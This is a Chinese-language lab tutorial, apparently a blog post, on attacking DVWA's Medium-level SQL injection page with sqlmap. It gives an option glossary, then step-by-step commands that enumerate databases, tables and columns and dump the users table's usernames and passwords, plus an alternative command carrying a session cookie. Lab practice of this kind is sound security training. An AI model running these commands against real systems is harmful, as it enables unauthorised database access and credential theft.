sqlmap测试dvwa-sql注入Medium

SQLmap 命令详解

b, –banner 检索数据库管理系统的标识
–current-user 检索数据库管理系统当前用户
–current-db 检索数据库管理系统当前数据库
–is-dba 检测 DBMS 当前用户是否 DBA
–users 枚举数据库管理系统用户
–privileges 枚举数据库管理系统用户的权限
–roles 枚举数据库管理系统用户的角色
–dbs 枚举数据库管理系统数据库
-D DBname 要进行枚举的指定数据库名
-T TBLname 要进行枚举的指定数据库表(如:-T tablename –columns)
–tables 枚举的 DBMS 数据库中的表
–columns 枚举 DBMS 数据库表列
–dump 转储数据库管理系统的数据库中的表项
–dump-all 转储所有的 DBMS 数据库表中的条目
–search 搜索列(S),表(S)和/或数据库名称(S)
-C COL 要进行枚举的数据库列
-r表示加载一个文件
-p指定参数

post型具体操作如下:

获取数据包

sqlmap测试dvwa-sql注入Medium_第1张图片

保存文件

sqlmap测试dvwa-sql注入Medium_第2张图片
sqlmap测试dvwa-sql注入Medium_第3张图片

sqlmap注入攻击

1.获取数据库信息

sqlmap -r /home/kali/post.txt -p id --dbs
sqlmap测试dvwa-sql注入Medium_第4张图片

2.获取当前数据库名称

sqlmap -r /home/kali/post.txt -p id --current-db
sqlmap测试dvwa-sql注入Medium_第5张图片

3.获取MySQL数据库中的表

sqlmap -r /home/kali/post.txt -p id -D dvwa --tables
sqlmap测试dvwa-sql注入Medium_第6张图片

4.获取user表中的字段

sqlmap -r /home/kali/post.txt -p id -D dvwa -T users --columns
sqlmap测试dvwa-sql注入Medium_第7张图片

5.获取用户名和密码

sqlmap -r /home/kali/post.txt -p id -D dvwa -T users -C user,password --dump
sqlmap测试dvwa-sql注入Medium_第8张图片

另一种方法

使用–data
sqlmap -u “http://192.168.101.59/dvwa-master/vulnerabilities/sqli/#” --cookie=“security=medium; PHPSESSID=dr93sgtn6v8561f84dbg9fs8iv” --data=“id=1&Submit=Submit” --batch
获取数据库信息以及表和列信息与上面的一致,此处略

你可能感兴趣的:(sqlmap,数据库)